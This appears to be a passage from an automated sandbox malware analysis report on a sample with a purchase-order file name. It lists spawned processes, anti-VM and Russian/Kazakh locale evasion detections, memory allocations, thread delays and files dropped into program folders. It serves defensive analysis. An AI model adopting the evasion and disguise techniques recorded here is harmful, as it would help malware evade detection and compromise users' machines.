Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 7708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: zeXKjViL.exe PID: 7272, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	15_2_00B152A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00C952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	20_2_00C952A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	26_2_008952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	27_2_00CD52A0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 11F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 2C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 9BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: ABF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: AE30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: BE30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 3660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 39A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Memory allocated: 38A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 3010000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 5010000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 9780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: A780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: A9A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: B9A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 4D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 6400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2E400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 2450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 4510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 34E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 36E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Memory allocated: 56E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 2E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 4FF0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

8_2_004019F0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4794	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4532	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2303
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 984

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
